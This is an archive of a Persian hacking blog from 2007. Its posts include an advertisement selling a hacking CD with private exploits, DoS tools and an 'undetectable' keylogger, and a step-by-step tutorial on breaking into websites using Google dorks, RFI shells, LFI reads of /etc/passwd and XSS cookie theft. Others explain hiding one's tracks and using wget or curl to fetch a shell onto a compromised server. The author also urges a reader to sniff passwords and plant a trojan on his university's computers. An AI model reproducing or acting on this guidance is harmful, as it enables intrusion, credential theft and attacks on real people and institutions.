تبليغاتX
شهر هک
شهر هک >>برنامه اموزش و تمامی ترفند های کامپیوتر و هک<<شهر هک
  www.h4ckcity.com

به نام و یاری خدا

 

با تشکر از زحمات دوستان عزیز و با تشکر از شما بازدید کنندگان محترم برای ارتقاء کیفی وبلاگ و استفاده همه گیر از وبلاگ و رفع انواع مشکلات و... تصمیم بر این داشتیم که با راه اندازی سایت به جای وبلاگ با خواست و اراده خداوند مسیره پیشرفت کمی و کیفی را زود تر به پایان برسانیم و اطمینان داریم که شما هم ما را در این راه تنها نخواهید گذاشت از این رو پس از انتظار و مدتی رنج و مشکلات را به جان خریدیم و سایت را با ارزوی موفقیت برای خودمان و بازدیدکنندگان به روز کردیم  برای ورود به سایت بر روی لینک زیر کلیک کنید .    H4ck City  را به خاطر بسپارید .

 

 ورود به سایت

 

|+| نوشته شده توسط mehdi در 86/10/04  |
 درگیر سایت هستم
سلام دوستان عزیزم .
واقعا شرمنده هستم . خیلی سرم شولوغه و هزار تا مشکل دور و برم رو گرفته از جمله همین سایت که نیاز به یه پرتال امن و سکوریستی داره .

اگه سایت درست شه دیگه همه چی تقریبا حله و همه سوال های شما رو تو اونجا جواب میدم .
به زودی میام .
فعلا بای تا های .

|+| نوشته شده توسط mehdi در 86/09/01  |
 جواب سوالات شما

سلام به شما دوستان عزیزم .

این وبلاگ هم داره کم کم درش تخته میشه و میخایم که یه سایت بزنیم . !!! و شاید بقیه اموزش های Over Flow  رو تو اونجا دادم .

اما امروز میخام که از یه سیدی فوقالعاده توپ هکینگ براتون بگم که دوسته عزیزم آرین (md5)  اونو درست کرده , البته اینو بگم که من در ساختن این سیدی هیچ کاری نکردم ولی میتونم به جرئت بگم که خیلی چیزه توپیه مخصوصا xpl   های پریوایتی که در اون به کار رفته .

این CD شامل بخش ۱- مقالات ۲- نرم افزار ۳- اموزشهای تصویری هستش .

در این CD چه چیزهایی را یاد میگیرید ؟

مقالات :

۱- مفاهیم ایتدایی لینوکس ۲- مبانی شبکه که شامل چند بخشه ۳- آموزش اکسپلویت نویسی یا همون نوشتن کدهای مخرب ۴- آموزش کامل FTP با تمام ریزه کاری ها ۵- پویش به روشIDLE - آشنای کامل با دستورات لینوکس ۶- مفاهیم اولیه پوسته در لینوکس ۷- مباحثی در مورد پروتکل ها ۸- توضیح کامل درباره Buffer OverFlow که خودش به چند بخش تقسیم میشه ۹- مقالات کامل در باره DOS که به طور کامل توضیح داده شده ۱۰- مقاله درباره گوگل هکینگ و ... مقالات زیادی را در این CD گذاشتم که ۱۰۰٪ تو هک کردن کمکتون میکنه

آموزش های تصویری :

۱- به دست آوردن لیست یوزر و پس FTP و کانکت شدن با نرم افزار Cuttp و در اختیار گرفتن کل سرور

۲- هک سایتها (سرورهای تحت ویندوزIIS )

۳- دانلود کردن پرتالها و اسکن کردن با اکسپلویت (RFI اسکنر) و پیدا کردن باگ داخل پرتال و تبدیل به اکسپلویت کردن و در آخر هم نفوذ

۴- بمب کردن میل افراد با یه برنامه PHP

۵- DOS کردن سایت با اکسپلویت جدید و priv8

۶- فیلمهای خارجی و گروه های دیگر و ....

نرم افزار :

۱- فقط میتونم بگم برنامه هایی هستن که گروههای بزرگ هک میان خودشان ردو بدل میکنن و بدست آوردن آنها کاره ساده ای نیست و در کناره این برنامه ها یه برنامه هم واسه هک وبلاگ گذاشتم به نام web spy 2.0

۲- گفتم به فکر اون دسته از عزیزانی که عشق هک کردن آیدی رو دارن باشم یه کیلوگر گذاشتم که هیچ انتی ویروسی اونو شناسایی نمیکنه حتی NOD32 که اینو به تنهایی دارن ۸۰۰۰ تومان میفروشن

این CD تضمین میکنه که بتونین سرورهای زیادی را مورد حمله قرار بدین و بتونین سایتهای زیادی را دیفیس کنین .

خوب حالا بریم سر اصل مطلب تعداد سیدی ۲ عدد . قیمت ۸۰۰۰ تومان

مبلغ فوق را به شماره حساب ۱/۸۱۳۹۱۲ بانک ملت شعبه طبرستان ساری به نام رضا گرامی واریز کنین فیش را میل بزنین سیدی طی ۴۸ ساعت آینده به دستتون خواهد رسید .

برای اطلاعت بیشتر به Shabestan_m_227 پم بدید یا با این شماره تماس بگیرید ۰۹۱۱۳۵۱۹۷۳۴

خوب این هم از اطلاعات این سیدی . من امروز اپ نمیکنم میذارم برای چند روز دیگه , شرمنده اصلا وقت نمیکنم . هنوز نرفتم به مدرسه امتحانام شروع شده :d

جواب سوالات شما عزیزان در ادامه مطلب هست .


ادامه مطلب
|+| نوشته شده توسط mehdi در 86/08/22  |
 Packet Analyzer
با سلام طبق تقتضای بیش از حد شما برای گذاشتن این برنامه من هم این برنامه رو گذاشتم امید وارم نهایت استفاده رو ببرید :

Download

|+| نوشته شده توسط مدیر وبلاگ در 86/08/21  |
 آشنایی با Over Flow و جواب سوالات شما

سلام دوستان عزیزم .

مهدی هستم , شرمنده که اینقدر دیر به دیر اپ میکنم .

قالب وبلاگمون رو چشم زدن !!! برای همین مجبور شدیم عوضش کنیم ولی تا چند روز دیگه بهترش رو درست میکنیم .

خوب بگذریم . با توجه به کمود مطلب های مبتدی برای هک حالا دیگه مجبوریم یه کمی مطالب رو سخت تر و پیشرفته تر و در عین حال جالب تر بکنیم .

بحثی که میخام در چند اپ متوالی دربارش صحبت کنم بحث Over Flow هست ! . شاید خیلی تعجب زده بشید که چه طور میخام این مبحث رو به شما عزیزان در چند اپ یاد بدم ولی اینو بگم که اگه یه کمی تمرین کنید از همه هکر ها بهتر یاد میگیرید ! .

اما over flow   نیازمند پیشنیاز هایی هست که اگه بعضی از اون ها رو هم بلد نباشید اشکالی نداره مثلا :

1-    آشنایی با حافظه (Stack)   

2-      برنامه نویسی (c++ , asmbeler )

3-      شل کد نویسی و اشنایی با سی پی یو ها

شما بر فرض که هیچ کدوم از موارد بالا رو بلد نیستید یا تا حالا اسمشون رو هم نشنیدید ! , من سعی خودم رو میکنم که تا جا داره مطالب رو برای شما ساده و صریح بیان کنم . و فیلم های اموزشی هم در این مورد برای شما درست میکنم . ;)

بهتره که این مبحث رو از همین حالا شروع کنیم .

 

Over Flow  چیست ؟؟؟

حملات Over Flow  داره انواع زیادی هست که ابتدا میخام که شما رو با ساده ترین روش که Stack Over flow  هست اشنا کنم .

اما Stack Over Flow  , به معنای سریز بافر بوده و از قدیمی ترین مشکلاتی هست که به علت بی توجه برنامه نویس در برنامه ها به وجود اومده . بافر حافظه ای هست که متغیر های هر برنامه ای توی اون قرار داره مثلا در زبان c++  متغیری به نام int   داره که این متغیر در بافر 2 بایت حجم داره .

که ما سعی داریم که برنامه ها رو سریز بافر کنیم .

 

سریز کردن بارف چه فایده ای داره ؟؟؟

باعث میشه که برنامه از مسیر و هدف اصلی خودش خارج بشه و دستور ما رو  اجرا کنه !! مثلا برنامه فتوشاپ رو یه کاری کنیم که تا هر کسی روش کلیک کرد یه تروجان یا بک دور یا ... روی سیستمش اجرا بشه !

 

Stack Over Flow   چگونه در برنامه ها ایجاد میشود ؟؟؟

فرض کنید که شما یه لیوان دارید که حداکثر حجمش 1 لیتر هست حالا شما بیاید اونو بذارید زیر شیر اب و به اندازه دو لیتر در اون اب بریزد حالا میبینید که اب سر ریز شده , در واقع شما دو لیتر اب میخاید حالا اومدید از یه ظرف یک لیتری استفاده میکنید ,  همین امر در برنمه نویسی صدق میکنه .

در حقیقت در اثر به کار گیری غلط تعدادی از توابع Stack Over Flow  یه وجود میاد .

strcpy,lstrcpyA,lstrpyW,wcscpy از مهم ترین این توابع هستند . (این 4 تابع رو حفظ کنید *)

 

چه طوری حافظه رو Over Flow  کنیم ؟؟

با اضافه کردن کاراکتر به برنامه حافظه اور فلو میشه و میفهمید که برنامه اور فلو شده .

در فیلمی که امروز برای شما اماده کردم این امر واضح تر بیان میشه .

میتونید فیلم رو از لینک زیر دانلود کنید .

 

دانلود فیلم اموزشی

 

جواب سوالات شما :

اقا نوید میگن مهدی میشه  اون برنامه ای که باهاش فیلم میگیری رو بزاری؟

 

میتونی از برنامه Camstudio   استفاده کنی . یه سرچ کوچولو در گوگل بزن . موفق باشی

 

اقا علی میگن که : سلام مهدي جان يك سوال داشتم در مورد اون قسمت warning يكي كه بعد از اينكه اين عبارت براي سايتي پيدا شد چطور ازش شل بگيريم اگه ميشه يك فيلم اموزشي بذار ممنون .

 

در جواب ایشون باید بگم که :: فیلم اموزشی در این باره زیاد گذاشتم در قسمت فیلم های اموزشی اون فیلم هایی که درباره کشف باگ های RFi   هست رو ببین و اون فیلم که وارنینگ ها رو از تو گوگل پیدا میکردیم (findshells) موفق باشی .

 

اقا پژمان : ٍسلام اون آموزش نیوک VB 3.6.7 V را که داده بودی من وقتی اون فایل VB367.PL را در محیط داس می زنم نمی دونم چرا فایل PL اجرا میشه اگه میشه کمک کن . دستت درد نکنه

خوب حتما برنامه Activ perl  رو نصب نکردی . این برنامه رو اول نصب کن بعد اون فایل رو اجرا کن . موفق باشی .

 

حسین و الیاس میگن که ::: با سلام خدمت آقا مهدی گل از شما می خواستم که اگه امکان داره برنامه pack analyzer 6.3را برای دانلود در سایت بگذارید .

 

میتونی این برنامه رو از اینجا دانلود کنید یا اینجا . موفق باشید .

 

خوب عزیزان این اپ هم به پایان رسید .

در اپ های بعدی شما رو با اور فلو بهتر و بیشتر اشنا میکنم .

نظر هاتون خیلی کم شده .

فعلا بای تا های

 

|+| نوشته شده توسط mehdi در 86/08/18  |
 توجه! توجه!
با سلام به همه دوستان یک مشکل کوچیک با بلاگفا پیدا کردیم باسه همین قالب وبلاگ رو عوض کردم تا اون یکی قالب رو درست کنم  فعلا شرمنده اون alert رو هم بلاگفا مشکل داره حلش میکنم چیزی نیست به هیچ وجه نگران نباشید که به سیستم شما حمله شده چون اصلا این کارا برای وبلاگ ننگه .

با تشکر مدیریت وبلاگ

|+| نوشته شده توسط مدیر وبلاگ در 86/08/15
 DSL چیست؟
سلام

ببخشید که یه مدته انقدر سرم شلوغه که وقت نمیکنم برم دنبال هک

امروز یه مقاله دست اول رو به دوم (جدی نگیرید چون خودم نمیدونم دست اوله یا نه)براتون اوردم

DSL یا Damn Small Linux

توضیحات کامل رو در پایین بخونید و خودمم یه چند خطی بهش اضافه میکنم

 

عرض شود که لینوکس پدر آمرزیده به علت اپن سورس بودنش هزار و یک توزیع مختلف با کارایی ها و کاربری ها گوناگون دارد، یکی از این توزیع ها اسمش هست DSL یا کاملترش می شود Damn Small Linux فارسی اش هم که واضح است "لینوکس بسیار کوچک" البته می شود به سبک من بعد از اینکه از دیدنش ذوق کردید بگوئید "لینوکس کوچک لعنتی" یا اصلا شاید درستش همین باشد. این توزیع از لینوکس صرفا برای این کامپیوترهایی که خیلی قدیمیه و کارهای دم دستی بر روی کامپیوترهای مختلفی که سیستم عامل بر رویشان نصب نیست یا نصب هست ولی به هر دلیلی مثل داشتن پسورد و عدم آگاهی از آن و... توسعه داده شده است.

از مزایایش اینکه حجمش فوق العاده کم است کل فایلی که شما باید دانلود کنید فقط ۹۵ مگابایت است، که برای یک سیستم عامل که همراه آن یا بهتر بگویم درون آن کلی نرم افزار کاربردی هم وجود دارد بسیار ایده آل است. DSL را تقریبا روی هر سیستمی و با کمترین امکانات می توان بوت کرد، بوت کردنش هم از روی CD یا یک درایو USB یا ابزارهای مشابه به سادگی امکان پذیر است و با سیستمی دارای ۱۶ مگابایت رم به بالا که ضعیف ترین CPU را هم دارا باشد به راحتی سر سازگاری دارد البته اگر آن را روی سیستمی با ۱۲۸ مگابایت رم بوت کنید کارایی نسبتا ایده آلش را می توانید ببینید ضمن اینکه از نظر قابلیت هایش در زمینه خطوط دستور نسبتا کارآمد و غنی است (این یکی را توسعه کنندگانش گفته اند نه من).

از همه اینها مهم تر تعداد نرم افزارهایی است که در این ۹۵ مگابایت گنجانده شده اند و خیلی روان با DSL کار میکنند، نرم افزارها عبارتند از XMMS ویژه ی MP3، سی دی های موسیقی و فرمت MPEG، یک ابزار FTP، مرورگر وب Dillo، مرورگر وب Netrik و مروگر محبوب فایرفاکس، ابزاری نسبتا ساده که کارهای Excel یا صفحات گسترده شما را راه می اندازد، Ted که ویژه ی ویرایش متون است، Xpaint برای نمایش تصاویر دیجیتالی و ویرایش ابتدایی آنها، Xpdf برای نمایش فایلهای PDF، نوعی ابزار مدیریت فایل به نام emelFM، یک نوع ابزار ویژه ی IM ولی خیلی کارایی نداره و بیشتر استفاده از آن می تواند برای IRC باشد که بین ما ایرانی ها رواج ندارد و ماشین حساب و چند ابزار کاربردی دیگر.

از طرفی DSL از مواردی مثل PPPoE و همینطور DHCP و PPP پشتیبانی خوبی به عمل می آورد که کار کسانی که ADSL دارند را برای اتصال به اینترنت ساده میکند و البته اگر سیستمی که شما از آن استفاده میکنید Wi-Fi داشته باشد به گفته توسعه دهندگانش Wi-Fi را هم ساپورت می کند.

 

اینجاست که خیلی ها اعصابشون خورد میشه (مثل خودم) که کامپیوتر قدیمیشونو چرا فروختند. اما حالا هم که چیزی نیست بلند میشیم میریم بازار یه سیستم کاملآ مال عهد آفتابه شاه جمع میکنید و با خیال راحت با یکی دانلود میکنید و بایکی هم کار های دیگه رو انجام میدید.

وسلام

راستی تا یادم نرفته منبع  

بای تا های

"Michael Bier"

|+| نوشته شده توسط احسان در 86/08/14  |
 اموزش هک کردن سایت و سرور

سلام دوستان عزیزم .

مونده بودم که چی براتون بذارم که خدا رو خوش بیاد . دیگه تقریبا هر مطلبی داشتیم و نداشتیم رو تو وبلاگ گذاشتیم . راستی اگر که شما فیلمی یا موضوعی رو میخاید بگین تا براتون بزنیم , البته توی موضوعات قبلی نباشه .

در این اپی که امروز برای شما عزیزان در نظر گرفته شده میخام که شما رو با نحوه هک کردن قدم به قدم سایت ها و سرور ها اشنا کنم .

قدم اول برای هک کردن هر سایتی جمع آوری اطلاعات از اون هست , مثلا فهمیدن نوع سرور , نوع پرتال استفاده شده در سایت مثلا phpbb   , پرت های باز بر روی سرور (این روش دیگه خیلی قدیمی شده ولی باز بر روی بعضی از سایت ها کار میده) مثل پرت های 139 , 79 , 445  و ... . و در اخر شما هر چی اطلاعات بیشتر در باره هدف خودتون بدونید بهتر هست و شما رو در قدم های بعدی کمک میکنه .

 

قدم دوم . پیدا کردن باگ در سرور یا خوده سایت هدف .

باگ هایی که برای هک کردن سایت به درد میخورن بیشتر به شرح زیر هستن :::

Remote File Include (RFI)   => که برای این روش دو تا فیلم اموزشی دادم بیرون که در وبلاگ هست

Local File Include or Load File Include (LFI)   => که برای این یکی هم یک فیلم اموزشی دادم بیرون که انشالله در اپ های بعدی به طور مفصل تری برای شما این باگ رو توضیح میدم .

Cross site scripting (css or xss)   => برای  این یکی هم یک فیلم اموزشی کاملا مفصل گذاشتیم .

Sql   => این باگ که پیدا کردنش خیلی سخته رو در اپ های بعدی برای شما توضیح میدم و فقط تا کنون یک مقاله خیلی توپ دربارش گذاشتم تو وبلاگ . اما برای یاد گیری کشف این باگ ها شما نیاز به اطلاعاتی در باره دستورات sql   دارید .

پیدا کردن باگ به دو روش محقق میشود یکی به وسیله اسکنر های امنیتی (مثل xscan – shadow) و دیگری به صورت دستی . که هر یک رو با توضیحات بیشتر براتون عرض میکنم .

اسکنر های امنیتی ::: در این روش برنامه امنیتی به وسیله اسکریپت هایی که بهش دادن شروع به گشت گذار در سایتی که بهش دادین میکنه و اگر طبق اون اسکریپت ها باگی در سایت بود اون رو به شما میده و در بعضی از اسکنر ها اکسپلویت رو هم به شما میده !

 

اما من خودم بیشتر به صورت دستی و بدون اسکنر باگ رو پیدا میکنم , که این روش رو برای شما توضیح میدم (البته به صورت مبتدی)

پیدا کردن باگ به صورت دستی ::: در بعضی از مواقع اسکنر ها خیلی خوب کار نمیدن و باگ رو به شما نمیدن . حالا شما باید به صورت دستی و بدون هیچ نرم افزاری روی سایت گشت و گذار کنید و باگ اون رو پیدا کنید .

شما میدونید که هر باگی به وسیله یه اشتباه برنامه نویسی به وجود میاد . و این اشتبا هات بر روی صفحات وب به صورت warning   پیدا میشن . و حال شما باید به دنبال این warning  ها بگردید . مثلا شما میتونید به وسیله warning  این خطا یعنی function.main از سایتی که این warning   رو داد شل بگییرید .

گوگل یه امکانی به شما میده که میتونید به وسیله اون یه کلمه رو توی یه سایت سرچ کنید به این صورت site:www.hackcity.blogfa.com warning = که در این مثال در وبلاگ خودمون به دنبال warning   میگرده ! و شما میتونید نام هر سایتی رو بدید و اگه اشتباه برنامه نویسی داشت (warning)  اون رو پیدا کنید و علیه سایت استفاده کنید . من خودم با این روش سایت های خیلی زیادی رو هک کردم .

یکی دیگه از روش هایی که برای پیدا کردن warning   استفاده میشه رو به صورت فیلم اموزشی خدمت شما عزیزان دادم (همون findshells)

اما یه روش خیلی ساده ترش اینه که شما cms  یا همون پرتال سایت رو گیر بیارید و دانلودش کنید و ببینید که ایا باگی داره یا نه مثلا باگه RFI   یکی از باگ های خیلی خطرناکی هست که در بیشتر پرتال ها هست . که در مورد پیدا کردن این باگ (RFI)   در cms  ها یه فیلم اموزشی خیلی مفصل گذاشتم . (در قسمت فیلم های اموزش هست)

 

قدم اخر . در این قدم که دیگه معلومه اکسپلویت کردن باگ و هک شدن سایت !

هر باگی که پیدا کردید به روش خواص خودش xpl   میشه .

اکسپلویت کردن باگ ها RFI   :: مثلا www.sitename.com/php/eat/index.php?file=sheller  که در اینجا شلر رو ران میکنه و اجرا میشه ! کلا xpl  کردن باگ RFI   خیلی اسونه . حالا یه کمی توضیح بیشتر در مورد xpl  کردن این باگ بدم .اگر شما سورس کد فایل index.php   رو داشته باشید میبینید که در یه یک خط از این سوروس کد متغیر file  رو یه یکی از شکل های زیر معرفی کرده ::

Include($File)

Include_once($File)

Require($File)

Require_once($File)

که در اینجا دیگه این متغیر $File   میشه باگه ما و ما به وسیله این از سایت شل گرفتیم . !

اکسپلویت کردن باگ LFI ::: این باگ xpl  کردنش از همه باگ ها اسون تره . مثلا :

www.sitename.com/php/eat/index.php?file=../../../../../etc/passwd

که در اینجا فایل passwd  رو برای ما لود میکنه و میاره . و شما میتونید هر فایلی در هر پوشه ای رو لود کنید و بخونید البته به شرط این که پرمیژن خوندن اون فایل بده .

  

اکسپلویت کردن باگ Xss or Css   ::: در مورد این باگ و xpl   کردن اون توضیحاتی رو در اپ دزدیدن کوکی ها و شل گرفتن با اون ها دادم . اما باز یه توضیح کوچیک بدم .

مثلا ::: http://sitename.com/index.php?file=

که درمثال بالا شما میتونید به جای Query   چیز های دیگه هم بذارید مثله ::

http://sitename.com/index.php?file=

که در مثال بالا کوکی های کاربر رو نشان میده .

بهتره که اون اپی که در این مورد زدم رو بخونید (دزدین کوکی ها) و با جزئیات بیشتر اشنا شید .

 

و در مورد xpl  کردن باگ Sql  بعدا به طور مفصلی براش توضیح میدم .

 

خوب میرسیم به جواب سوالات شما دوستان عزیز .

اقای خلیل شقاقی و اقا مهدی  میپرسند که ::: سلام دوست عزیز وبلاگ خوبی داری.من می خواستم طریقه هک یونیکس رو برام بزارین البته اگه کامل باشه ممنون میشم
خیلی گشتم ولی مطالب تازه وقابل اجرایی تو سایتهای دیگه پیدا نکردم
امیدوارم در نظر دادن قوانینی که گفتین رعایت کرده باشم

در جواب این اقای عزیز باید عرض کنم که :: ببین وقتی که توی هک اسمه یونیکس میاد همه به فکر سیستم های سازگار با یونیکس میافتند مثلا لینوکس , سلاریس , freeBSD   و ... سیستم های عاملی هستند که با یونیکس سازگارند در واقع دیگه کسی از یونیکس برای سیستم های تحت وب استفاده نمیکنه بیشتر از لینوکس و سلاریس و FreeBSD   برای استفاده میشه , تاریخ ساخت یونیکس بر میگرده با 30 سال و خورده ای پیش !

حالا اگه منظوره شما از یونیکس لینوکس باشه باید بگم که هیچ اکسپلویتی نیست که بتونه لینوکس رو از راه دور به صورت ریموت هک کنه (و اگر هم باشه که مطمئنم نیست , priv8  هست ) شما فقط از راه برنامه های تحت وب (مثل پرتال ها ) میتونی لینوکس یا بقیه سیستم عامل های سازگار با یونیکس رو هک کنید . توضیحات در این باره خیلی دارم ولی همین قدر کفایت میکنه . موفق باشی .

 

اقا amin   هم کرک اسکنر acunetix 5.1 رو میخاد . باید بگم که کرک این اسکنر توی ویرانگر قسمت tools   هست . ;)   

 

اقا احسان هم میگن که : این که میگید برای استفاده از اسنیفر ها باید دسترسی ریموت دشته باشین یعنی چی؟و چطور میشه دسترسی ریموت داشت؟

در جواب این اقا هم باید باگم که :: یعنی شما از اون سروری که میخاید اسنیفش کنید باید یه دسترسی حداقل داشته باشید تا بتونید عمل اسنیف رو انجام بدید . مثلا فرض کن که به سرور بلاگفا نفوذ کردی حالا میخای که اسنیفش کنی , حال شما باید یک برنامه اسنیفر رو روی سرور اپلود کنی بعد اون برنامه رو نصب کنی بعد اون برنامه رو اجرا کنی و بعد خواهید دید که پسورد های رمز شده برای شما به نمایش در میاد (که همه این اعمال مثل نصب برنامه اسنیفر و ... با یک خط فرمانی که از سرور دارید میتونید انجام بدید در واقع اگه بخام برات راحت توضیح بدم که ریموت چیه ؟! ریموت در واقع همین خط فرمان هست که شما از سرور دارید . شما میتونید از ریموت دکستاپ هم برای این کار استفاده کنید که خیلی بهتره و به صورت گرافیکی میتونید کار کنید . )  که در فیلم اموزشی که براتون در قسمت فیلم های اموزشی گذاشتم دیکود کردن پسورد ها و ... رو به شما عزیزان اموزش دادم . موفق باشید  .

 

جواب اقا مهران-328 , دوسته عزیز شما چندین تا راه دارید که اگه من جای شما بودم تا حالا پدر اون دانشگاه رو در اورده بودم . شما میتونید همین عمل اسنیف کردن رو روی اون کامیپوتری که پشتت نشستی انجام بدی و تمام پسورد ها رو به دست بیاری بعدم با این روش میتونی پسورد ادمین سایت رو هم به دست بیاری . و ... یا این که یه تروجان بدجور بندازی توی پوشه startup   کامپیوتر و .... . راه زیاده برای این که پدرشون رو در بیاری . ولی بهترین راه اینه که دیگه به کافی نت دانشگاهتون نرین! .

 نظر یادتون نره  

فعلا بای تا های

|+| نوشته شده توسط mehdi در 86/08/11  |
 SSH پاک کردن رد پا با

سلام دوستان عزیز .

وبلاگه ما هم دو ساله شد !!!

امیدوارم که تو این دوسال توشنته باشیم که شما عزیزان رو با روش های مختلف هکینگ اشنا کنیم .

 

تو این اپی که امروز برای شما در نظر گرفتم یاد میگیرید که چه طوری ssh   رو بسازید .

من خودم تا حالا فیلمی در این مورد ندیده بودم گفتم که یکی هم برای شما عزیزان بذارم .

همچنین یاد میگیرید که چه طوری ای پی خودتون رو با این روش عوض کنید و رد پا خودتون رو پاک کنید .

خیلی فیلم رو نپیچوندم با یه بار نگاه همه چیز دستتون میاد فقط یه برنامه به اسمه putty   هست که باید اون رو داشته باشید یه سرچ کوچیک تو گوگل بزنید هزار تا لینک از این برنامه رو به شما میده .

خوب میتونید فیلم رو از لینک زیر دانلود کنید و حالش رو ببرید ::

 

 دانلود فیلم اموزشی

 

حجمش هم خیلی کم هست کمتر از یک دقه دانلود میشه .

 

خوب جواب سوالات شما :: اول از همه از اقا علی گل باید تشکر کنم که این قدر به ما لطف دارن بعدم ایدی من همونی هست که تو فیلم هام میذارم دیگه kalepaz70@yahoo.com   . اون اسکپریپتی هم که مطالبه وبلاگم رو ضد کپی کرده همون اسکریپت های معمولی هست فقط جاشو تنظیم کردیم که تا وبلاگ لود شد این اول از همه بیاد بالا !! موفق باشی .

 

اما جواب اقا اس آتروپات . اقا من واقعا شرمندم نمیتونم تو وبلاگت اپ کنم ! اصلا وقت ندارم علاوه بر این وبلاگ تو سایت های دیگه و ... اپ میکنم که اصلا برام وقت نمیذاره علاوه بر این ها مدرسه و درس هم یه طرف که دیگه شما با این ها باید بیشتر اشنا باشید . !!! موفق باشید .

 

اما اقا محسن میگن که ::: سلام
اقا مهدی اگه بتونی نحوه روت گرفتن بدون داشتن
ip valid رو به صورت فیلم یا مقاله بنویسی بذاری اینجا ممنون میشم .

 

در جواب اقا محسن هم باید بگم که شما میتونید به وسیله vpn   یا انتقال شل یا شایدم همین فیلمی که امروز درباره عوض کردن ای پی گذاشتم ای پی خودتون رو تغییر بدید و ولیدش کنید . خیلی کاره پیچیده ای نیس اگه یه vpn   مجانی یا پولی بگیری دیگه کار تمومه . برای گرفتن vpn   میتونی یه زنگ بزنی به isp   که ازش  استفاده میکنی بعد ازش بپرسید که اکانت vpn   میدن یا نه ! همین ! موفق باشی .

 

خوب اینم از اپ امروز امیدوارم که لذت برده باشید .

نظر یادتون , التماس دعا .

فعلا بای تا های .

|+| نوشته شده توسط mehdi در 86/08/02  |
 LFI کشف باگ های

سلام دوستان گلم :D

گتم بیام اپ کنم تا دیر نشده .

در این اپ جواب سوال های شما داده شده .

توی این درس تصویری که براتون اماده کردم یه قدم شما رو به سرور هکینگ نزدیک تر میکنه , شما یاد میگیرد که چه طوری باگ های Lfi  (load file include)   رو کشف کنید .

البته این فیلم رو برای شما به صورت خیلی خیلی مبتدیانه اماده کردم . ولی باز به پروفرسینال ها پیشنهاد میکنم که ببینن .

همه توضیحات توی فیلم داده شده هیچ چیزی هم باقی نموده که نگفته باشم !! , پس میتونید فیلم رو از لینک زیر دانلود کنید ::

 

دانلود فیلم اموزشی

 

خوب بریم سر سوال های شما ::

اقا amir   از فرصت استفاده کردن رو چند تا سوال پرسیدن که به علت زیادی سوال هاشون نمیتونم برای شما بذارم میتونید توی قسمت نظر ها بخونید اما در جواب امیر باید بگم که ::: سایت پارس گیگ خراب اپلود کرده برات !! اما باید بهت بگم که دیگه سایتی رو نمیشه از لحاظ پرتی هک کرد فقط کشف اسیب پذیری که درس امروز ما هم درباره این هست . و در مورد iis   هم بگم که هر چند که از لحاظ برنامه نویسی ضعیف هست اما تا به حال باگی براش پیدا نشده که به صورت کاملا ریموت بشه هکش کرد . اگه اون xpl   کامپایل نشد با gcc  در لینوکس و یا با lcc  در ویندوز کامپایل کن . سوال های خوبت همینا بود . موفق باشی .

 

اقا مهدی سوال خیلی خوبی پرسیدن :: سلام مي خواستم ببينم با چه فرمانب تو شلر سي99 ميشه وارد tempشد و با چه فرماني شلر رو اونجا آپلود كنيم ؟
فرمان
wget بره چيه ؟

 

شما با فرمان cd /tmp  میتونید وارد  این پوشه بشید . و با دستوراتی مثله wget , curl , GET   و .. میتونید فایل هات رو اپ کنی که دستوراتش فرق میکنه مثلا به صورت زیر :

Wget url

Curl esme file.pasven –o url

مثلا بالایی میشه :: curl dc.pl –o url

GET url > esme file.pasvend

 

خوب جواب اقا علی هم که معلومه  :: متا اسپلویت بیشتر باگ هاش پتچ شده . اما از یه پرتال چه طوری باگ بگیری باید اون رو اول روی لوکال هاست خودت نصب کنی میتونی از  easy php   استفاده کنی  بعد اون رو به صورت لوکال یا دستی  اسکن کنی بعد باگ رو اگه داد که هیچ اگه نداد باید خودت بگیری به صورت دستی روی سورس کد هاش کار کنی . موفق باشی .

 

اما جواب اقا کامران :: من می خواستم ازتون در خواست یک فیلم در باره ی پیدا کردن باگ در یک سایت که می خوام از اول اسکن کردن باشه بهتر و همه بهتر یاد می گیرن .

 

دوسته عزیز میتونی از اسکنر شادو یا ... استفاده کنی یا به صورت دستی کار کنی شاید من درست منظورت رو نفهمده باشم سوالت و واضح تر بپرس. ولی اگه فیلمی در این مورد میخاین , کشف باگ با اسکنر چشم . اگه وقت شد حتما میذارم . موفق باشی

 

اما در جواب اقا محمد که میگن حجم فیلماتون بالاست , باید بگم که چیزی نیست که همش 10 دقه بیشتر طول نمیکشه .!!

 

خوب اینم از این اپ. اگه سوالی داشتید در خدمتم .

نظرم یادتون نره .

فعلا بای تا های .

|+| نوشته شده توسط mehdi در 86/07/29  |
 چیست؟ shell

سلام دوستان عزیزم .

واقعا ببخشید که یه چند روزی نبودم خیلی سرم شولوغ بود !!! سرم رو نمیتونم بعضی وقت ها از روی کتاب بردارم . امیداورام که بتونم تو این اپ جبران کنم .

در این آپ قصد دارم شما رو با زبانی خیلی ساده و روان شما رو با شل (shell) ها اشنا کنم البته این رو بگم که شل رو با شلر های php   مثل c99   اشتباه نگیرید . !

قبل از شروع کار بگم که شل به معنای پوسته هست . و معمولا با علامت مخفف .sh   نشون میدن .

 

شاید تا به حال شماکلمه شل (shell) رو زیاد شنیده باشید ولی نمیدونید که اصلا یعنی چی ؟؟؟

ببینید دوستان شما هر کاری توی ویندوز یا توی هر سیستم عاملی (لینوکس , سلاریس و ..) که انجام میدید به صورت زبان دو دویی در میاد یا همون صفر و یک در میاد بعد به هسته سیستم عامل میخوره بعد به حافظه و بعد اجرا میشه مثلا فرض کنید که میرید توی cmd   و میزنید dir   خوب معلوم هست که این دستور محتویات یک دایرکتوری رو نشون میشه در واقع این دستور ابتدا به صورت صفر و یک در میاد و بعد اجرا میشه .

اون چیزی که دستورات شما رو میگیره و تبدیل به صفر و یک میکنه و اون رو به سمت کرنل سیستم عامل میفرسته همون شل (shell)  هست !!!

حالا فرض کنید که اصلا چیزی در سیستم های عامل به اسمه شل وجود نداره اونوقت می فهمید که چه قدر کار با کامپیوتر دردسر ساز و سخت بود . مثلا برای اجرای همین دستور dir   باید مقادیر زیادی از صفر و یک رو میزدید یا زبان های سطح پایین مثله اسمبلی و hex   رو بلد بودید !!! .

اما یه نکته خیلی مهمی که در شل ها حائز اهمیت هست فرق اون ها هست مثلا شلری که در ویندوز استفاده میشه فرق میکنه با شلره سیستم عامل لینوکس .

اون شلی که در ویندوز استفاده میشه command.com   هست (همون cmd   رو میگم) و شلی که در سیستم عامل لینوکس به کار گرفته میشه شله bash   هست که در پوشه bin   ذخیره شده . و البته شل های دیگری هم وجود دارن مثله ksh  (freebsd) و csh   که در سیستم عامل unix system v   استفاده میشه  .

 

یک شل خوب چه ویژگی هایی داره ؟؟؟

اگه نظره منو بخاین من شل لینوکس رو بیشتر خاطرشو میخام تا ویندوز (البته این نظر رو از لحاظ هکری میگم )

